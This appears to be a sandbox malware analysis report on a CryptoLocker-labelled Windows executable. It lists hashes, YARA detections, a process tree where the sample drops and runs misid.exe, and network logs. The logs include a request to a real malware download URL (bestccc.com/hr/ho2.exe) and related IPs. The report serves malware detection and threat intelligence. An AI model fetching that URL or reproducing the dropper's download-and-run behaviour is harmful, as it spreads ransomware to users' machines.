77d274af2cd6f0305434f13d79c72f600b005dbb67c934ec76c0852bee525764

Analysis

max time kernel
151s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
19/03/2024, 19:29 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-03-19_276cd545c2f30dee4447e35afbc8c3c8_cryptolocker.exe
Size

103KB
MD5

276cd545c2f30dee4447e35afbc8c3c8
SHA1

cbef548f127a9cdffbc699a60943ec50be7a681e
SHA256

77d274af2cd6f0305434f13d79c72f600b005dbb67c934ec76c0852bee525764
SHA512

d7d6da97d7d024842d32e77cd9acac2e33260635f0d04f0a0885ad891e5e7cfcac83a21310a4a7c8bb5f9894ed94cb646d84c45d635cfc8dd9ab40c2f2e81c05
SSDEEP

768:xQz7yVEhs9+4uR1bytOOtEvwDpjWfbZ7uyA36S7MpxRiWNa9mktJHlv/k2mwVe9O:xj+VGMOtEvwDpjubwQEIiVmkxv/y9O

Score

9^/10

Malware Config

Signatures

Detection of CryptoLocker Variants 5 IoCs

resource	yara_rule
behavioral2/memory/408-0-0x0000000000500000-0x0000000000510000-memory.dmp	CryptoLocker_rule2
behavioral2/files/0x000800000002322a-13.dat	CryptoLocker_rule2
behavioral2/memory/408-17-0x0000000000500000-0x0000000000510000-memory.dmp	CryptoLocker_rule2
behavioral2/memory/4444-18-0x0000000000500000-0x0000000000510000-memory.dmp	CryptoLocker_rule2
behavioral2/memory/4444-59-0x0000000000500000-0x0000000000510000-memory.dmp	CryptoLocker_rule2

Detection of Cryptolocker Samples 5 IoCs

resource	yara_rule
behavioral2/memory/408-0-0x0000000000500000-0x0000000000510000-memory.dmp	CryptoLocker_set1
behavioral2/files/0x000800000002322a-13.dat	CryptoLocker_set1
behavioral2/memory/408-17-0x0000000000500000-0x0000000000510000-memory.dmp	CryptoLocker_set1
behavioral2/memory/4444-18-0x0000000000500000-0x0000000000510000-memory.dmp	CryptoLocker_set1
behavioral2/memory/4444-59-0x0000000000500000-0x0000000000510000-memory.dmp	CryptoLocker_set1

Detects executables built or packed with MPress PE compressor 5 IoCs

resource	yara_rule
behavioral2/memory/408-0-0x0000000000500000-0x0000000000510000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/files/0x000800000002322a-13.dat	INDICATOR_EXE_Packed_MPress
behavioral2/memory/408-17-0x0000000000500000-0x0000000000510000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/4444-18-0x0000000000500000-0x0000000000510000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/4444-59-0x0000000000500000-0x0000000000510000-memory.dmp	INDICATOR_EXE_Packed_MPress

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	2024-03-19_276cd545c2f30dee4447e35afbc8c3c8_cryptolocker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	misid.exe

Executes dropped EXE 1 IoCs

pid	Process
4444	misid.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 408 wrote to memory of 4444	408	2024-03-19_276cd545c2f30dee4447e35afbc8c3c8_cryptolocker.exe	90
PID 408 wrote to memory of 4444	408	2024-03-19_276cd545c2f30dee4447e35afbc8c3c8_cryptolocker.exe	90
PID 408 wrote to memory of 4444	408	2024-03-19_276cd545c2f30dee4447e35afbc8c3c8_cryptolocker.exe	90

C:\Users\Admin\AppData\Local\Temp\2024-03-19_276cd545c2f30dee4447e35afbc8c3c8_cryptolocker.exe
"C:\Users\Admin\AppData\Local\Temp\2024-03-19_276cd545c2f30dee4447e35afbc8c3c8_cryptolocker.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:408
- C:\Users\Admin\AppData\Local\Temp\misid.exe
  "C:\Users\Admin\AppData\Local\Temp\misid.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:4444

Network

DNS

bestccc.com

misid.exe

Remote address:

8.8.8.8:53

Request

bestccc.com

IN A

Response

bestccc.com

IN A

103.14.121.240
DNS

23.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.159.190.20.in-addr.arpa

IN PTR

Response
GET

https://bestccc.com/hr/ho2.exe

misid.exe

Remote address:

103.14.121.240:443

Request

GET /hr/ho2.exe HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: bestccc.com
Cache-Control: no-cache

Response

HTTP/1.1 415 Unsupported Media Type

Date: Tue, 19 Mar 2024 19:28:35 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Server: imunify360-webshield/1.21
DNS

241.150.49.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.150.49.20.in-addr.arpa

IN PTR

Response
DNS

202.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

202.178.17.96.in-addr.arpa

IN PTR

Response

202.178.17.96.in-addr.arpa

IN PTR

a96-17-178-202deploystaticakamaitechnologiescom
DNS

202.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

202.178.17.96.in-addr.arpa

IN PTR
DNS

241.154.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.154.82.20.in-addr.arpa

IN PTR

Response
DNS

240.121.14.103.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.121.14.103.in-addr.arpa

IN PTR

Response

240.121.14.103.in-addr.arpa

IN PTR

10314121240-static-reversegooddomainregistrycom
DNS

240.121.14.103.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.121.14.103.in-addr.arpa

IN PTR
DNS

43.58.199.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.58.199.20.in-addr.arpa

IN PTR

Response
DNS

23.149.64.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.149.64.172.in-addr.arpa

IN PTR

Response
DNS

crl.comodoca.com

misid.exe

Remote address:

8.8.8.8:53

Request

crl.comodoca.com

IN A

Response

crl.comodoca.com

IN CNAME

crl.comodoca.com.cdn.cloudflare.net

crl.comodoca.com.cdn.cloudflare.net

IN A

172.64.149.23

crl.comodoca.com.cdn.cloudflare.net

IN A

104.18.38.233
GET

http://crl.comodoca.com/cPanelIncCertificationAuthority.crl

misid.exe

Remote address:

172.64.149.23:80

Request

GET /cPanelIncCertificationAuthority.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: crl.comodoca.com

Response

HTTP/1.1 200 OK

Date: Tue, 19 Mar 2024 19:29:26 GMT
Content-Type: application/pkix-crl
Content-Length: 61176
Connection: keep-alive
Last-Modified: Tue, 19 Mar 2024 17:10:03 GMT
ETag: "65f9c6eb-eef8"
X-CCACDN-Mirror-ID: sscrl2
Cache-Control: max-age=14400, s-maxage=3600
Expires: Tue, 26 Mar 2024 17:10:03 GMT
X-CCACDN-Proxy-ID: mcdpinlb5
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: HIT
Age: 331
Accept-Ranges: bytes
Server: cloudflare
CF-RAY: 866fdf0b2d4a7743-LHR
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
DNS

41.110.16.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.110.16.96.in-addr.arpa

IN PTR

Response

41.110.16.96.in-addr.arpa

IN PTR

a96-16-110-41deploystaticakamaitechnologiescom
DNS

9.228.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.228.82.20.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

232.168.11.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.168.11.51.in-addr.arpa

IN PTR

Response
DNS

185.13.222.173.in-addr.arpa

Remote address:

8.8.8.8:53

Request

185.13.222.173.in-addr.arpa

IN PTR

Response

185.13.222.173.in-addr.arpa

IN PTR

a173-222-13-185deploystaticakamaitechnologiescom
DNS

119.110.54.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

119.110.54.20.in-addr.arpa

IN PTR

Response
DNS

140.71.91.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

140.71.91.104.in-addr.arpa

IN PTR

Response

140.71.91.104.in-addr.arpa

IN PTR

a104-91-71-140deploystaticakamaitechnologiescom
DNS

196.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.178.17.96.in-addr.arpa

IN PTR

Response

196.178.17.96.in-addr.arpa

IN PTR

a96-17-178-196deploystaticakamaitechnologiescom
DNS

196.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.178.17.96.in-addr.arpa

IN PTR
DNS

70.179.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

70.179.17.96.in-addr.arpa

IN PTR

Response

70.179.17.96.in-addr.arpa

IN PTR

a96-17-179-70deploystaticakamaitechnologiescom
DNS

134.71.91.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

134.71.91.104.in-addr.arpa

IN PTR

Response

134.71.91.104.in-addr.arpa

IN PTR

a104-91-71-134deploystaticakamaitechnologiescom
DNS

65.179.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

65.179.17.96.in-addr.arpa

IN PTR

Response

65.179.17.96.in-addr.arpa

IN PTR

a96-17-179-65deploystaticakamaitechnologiescom
DNS

88.156.103.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.156.103.20.in-addr.arpa

IN PTR

Response
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418574_15LZ4V0VK97RULTEQ&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239340418574_15LZ4V0VK97RULTEQ&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 195348
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: ED811074448442B98CE84D24585BD2E5 Ref B: LON04EDGE1119 Ref C: 2024-03-19T19:30:10Z
date: Tue, 19 Mar 2024 19:30:10 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239339388172_11H31EUO703JYE8HS&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239339388172_11H31EUO703JYE8HS&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 428945
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 48B08926DC8245BEB646D17F619BA953 Ref B: LON04EDGE1119 Ref C: 2024-03-19T19:30:10Z
date: Tue, 19 Mar 2024 19:30:10 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418573_1OCPZP6XQOXA94H84&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239340418573_1OCPZP6XQOXA94H84&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 280365
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 792B9989E4B84B88B584397C324A9C17 Ref B: LON04EDGE1119 Ref C: 2024-03-19T19:30:10Z
date: Tue, 19 Mar 2024 19:30:10 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301075_1EVAVP8NT46RWGGT8&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301075_1EVAVP8NT46RWGGT8&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 285024
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6BD85CD412C947F8A47E6F0EE3864DDA Ref B: LON04EDGE1119 Ref C: 2024-03-19T19:30:11Z
date: Tue, 19 Mar 2024 19:30:10 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239339388173_143HGT0XS5NV1OXIB&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239339388173_143HGT0XS5NV1OXIB&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 270198
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 0A09E8A97E054998B7175AA028D5FB7E Ref B: LON04EDGE1119 Ref C: 2024-03-19T19:30:11Z
date: Tue, 19 Mar 2024 19:30:10 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301508_1C46JYBQTKFOJ8JCV&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301508_1C46JYBQTKFOJ8JCV&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 281287
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 86A2E8CAB71740E483D805CD862EECE2 Ref B: LON04EDGE1119 Ref C: 2024-03-19T19:30:11Z
date: Tue, 19 Mar 2024 19:30:11 GMT
DNS

188.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

188.178.17.96.in-addr.arpa

IN PTR

Response

188.178.17.96.in-addr.arpa

IN PTR

a96-17-178-188deploystaticakamaitechnologiescom
DNS

173.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

173.178.17.96.in-addr.arpa

IN PTR

Response

173.178.17.96.in-addr.arpa

IN PTR

a96-17-178-173deploystaticakamaitechnologiescom
DNS

173.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

173.178.17.96.in-addr.arpa

IN PTR
DNS

23.236.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.236.111.52.in-addr.arpa

IN PTR

Response
DNS

23.236.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.236.111.52.in-addr.arpa

IN PTR
DNS

210.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

210.178.17.96.in-addr.arpa

IN PTR

Response

210.178.17.96.in-addr.arpa

IN PTR

a96-17-178-210deploystaticakamaitechnologiescom
DNS

210.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

210.178.17.96.in-addr.arpa

IN PTR
DNS

0.205.248.87.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.205.248.87.in-addr.arpa

IN PTR

Response

0.205.248.87.in-addr.arpa

IN PTR

https-87-248-205-0lgwllnwnet
DNS

0.205.248.87.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.205.248.87.in-addr.arpa

IN PTR

Response

0.205.248.87.in-addr.arpa

IN PTR

https-87-248-205-0lgwllnwnet
DNS

145.71.91.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

145.71.91.104.in-addr.arpa

IN PTR

Response

145.71.91.104.in-addr.arpa

IN PTR

a104-91-71-145deploystaticakamaitechnologiescom
DNS

83.179.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

83.179.17.96.in-addr.arpa

IN PTR

Response

83.179.17.96.in-addr.arpa

IN PTR

a96-17-179-83deploystaticakamaitechnologiescom
DNS

83.179.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

83.179.17.96.in-addr.arpa

IN PTR
DNS

104.193.132.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

104.193.132.51.in-addr.arpa

IN PTR

Response

103.14.121.240:443

https://bestccc.com/hr/ho2.exe

tls, http

misid.exe

1.3kB
2.4kB
12
6

HTTP Request

GET https://bestccc.com/hr/ho2.exe

HTTP Response

415
172.64.149.23:80

http://crl.comodoca.com/cPanelIncCertificationAuthority.crl

http

misid.exe

1.4kB
63.6kB
28
48

HTTP Request

GET http://crl.comodoca.com/cPanelIncCertificationAuthority.crl

HTTP Response

200
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.4kB
8.5kB
19
14
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.4kB
8.5kB
19
14
204.79.197.200:443

https://tse1.mm.bing.net/th?id=OADD2.10239317301508_1C46JYBQTKFOJ8JCV&pid=21.2&w=1080&h=1920&c=4

tls, http2

63.8kB
1.8MB
1322
1313

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418574_15LZ4V0VK97RULTEQ&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239339388172_11H31EUO703JYE8HS&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418573_1OCPZP6XQOXA94H84&pid=21.2&w=1080&h=1920&c=4

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301075_1EVAVP8NT46RWGGT8&pid=21.2&w=1920&h=1080&c=4

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239339388173_143HGT0XS5NV1OXIB&pid=21.2&w=1080&h=1920&c=4

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301508_1C46JYBQTKFOJ8JCV&pid=21.2&w=1080&h=1920&c=4

HTTP Response

200

8.8.8.8:53

bestccc.com

dns

misid.exe

57 B
73 B
1
1

DNS Request

bestccc.com

DNS Response

103.14.121.240
8.8.8.8:53

23.159.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

23.159.190.20.in-addr.arpa
8.8.8.8:53

241.150.49.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

241.150.49.20.in-addr.arpa
8.8.8.8:53

202.178.17.96.in-addr.arpa

dns

144 B
137 B
2
1

DNS Request

202.178.17.96.in-addr.arpa

DNS Request

202.178.17.96.in-addr.arpa
8.8.8.8:53

241.154.82.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

241.154.82.20.in-addr.arpa
8.8.8.8:53

240.121.14.103.in-addr.arpa

dns

146 B
139 B
2
1

DNS Request

240.121.14.103.in-addr.arpa

DNS Request

240.121.14.103.in-addr.arpa
8.8.8.8:53

43.58.199.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

43.58.199.20.in-addr.arpa
8.8.8.8:53

23.149.64.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

23.149.64.172.in-addr.arpa
8.8.8.8:53

crl.comodoca.com

dns

misid.exe

62 B
143 B
1
1

DNS Request

crl.comodoca.com

DNS Response

172.64.149.23

104.18.38.233
8.8.8.8:53

50.23.12.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

50.23.12.20.in-addr.arpa
8.8.8.8:53

41.110.16.96.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

41.110.16.96.in-addr.arpa
8.8.8.8:53

9.228.82.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

9.228.82.20.in-addr.arpa
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

232.168.11.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

232.168.11.51.in-addr.arpa
8.8.8.8:53

185.13.222.173.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

185.13.222.173.in-addr.arpa
8.8.8.8:53

119.110.54.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

119.110.54.20.in-addr.arpa
8.8.8.8:53

140.71.91.104.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

140.71.91.104.in-addr.arpa
8.8.8.8:53

196.178.17.96.in-addr.arpa

dns

144 B
137 B
2
1

DNS Request

196.178.17.96.in-addr.arpa

DNS Request

196.178.17.96.in-addr.arpa
8.8.8.8:53

70.179.17.96.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

70.179.17.96.in-addr.arpa
8.8.8.8:53

134.71.91.104.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

134.71.91.104.in-addr.arpa
8.8.8.8:53

65.179.17.96.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

65.179.17.96.in-addr.arpa
8.8.8.8:53

88.156.103.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

88.156.103.20.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
173 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

188.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

188.178.17.96.in-addr.arpa
8.8.8.8:53

173.178.17.96.in-addr.arpa

dns

144 B
137 B
2
1

DNS Request

173.178.17.96.in-addr.arpa

DNS Request

173.178.17.96.in-addr.arpa
8.8.8.8:53

23.236.111.52.in-addr.arpa

dns

144 B
158 B
2
1

DNS Request

23.236.111.52.in-addr.arpa

DNS Request

23.236.111.52.in-addr.arpa
8.8.8.8:53

210.178.17.96.in-addr.arpa

dns

144 B
137 B
2
1

DNS Request

210.178.17.96.in-addr.arpa

DNS Request

210.178.17.96.in-addr.arpa
8.8.8.8:53

0.205.248.87.in-addr.arpa

dns

142 B
232 B
2
2

DNS Request

0.205.248.87.in-addr.arpa

DNS Request

0.205.248.87.in-addr.arpa
8.8.8.8:53

145.71.91.104.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

145.71.91.104.in-addr.arpa
8.8.8.8:53

83.179.17.96.in-addr.arpa

dns

142 B
135 B
2
1

DNS Request

83.179.17.96.in-addr.arpa

DNS Request

83.179.17.96.in-addr.arpa
8.8.8.8:53

104.193.132.51.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

104.193.132.51.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\misid.exe

Filesize
103KB

MD5
7abe3df0e1a3b8b6c81e1e6aae4c48d5

SHA1
3235b1dd3ef79f20bf8064e73fb9bd1d10d8a475

SHA256
ec93db0e0bc235e95b45a97d3313dae238f162307119f9157b48f52a2fe3dee5

SHA512
f054eaa06fea611f01115039e14262a745a31f9c2307fa171e15bc875f9c74090569ed453e2fda5bd1775191d65f70e48f1012a71bc0f09785b2e3e0aa509453

Download Submit
memory/408-0-0x0000000000500000-0x0000000000510000-memory.dmp

Filesize
64KB

Download
memory/408-1-0x00000000005A0000-0x00000000005A6000-memory.dmp

Filesize
24KB

Download
memory/408-2-0x00000000005A0000-0x00000000005A6000-memory.dmp

Filesize
24KB

Download
memory/408-3-0x00000000005C0000-0x00000000005C6000-memory.dmp

Filesize
24KB

Download
memory/408-17-0x0000000000500000-0x0000000000510000-memory.dmp

Filesize
64KB

Download
memory/4444-18-0x0000000000500000-0x0000000000510000-memory.dmp

Filesize
64KB

Download
memory/4444-20-0x0000000000750000-0x0000000000756000-memory.dmp

Filesize
24KB

Download
memory/4444-22-0x0000000000660000-0x0000000000666000-memory.dmp

Filesize
24KB

Download
memory/4444-59-0x0000000000500000-0x0000000000510000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

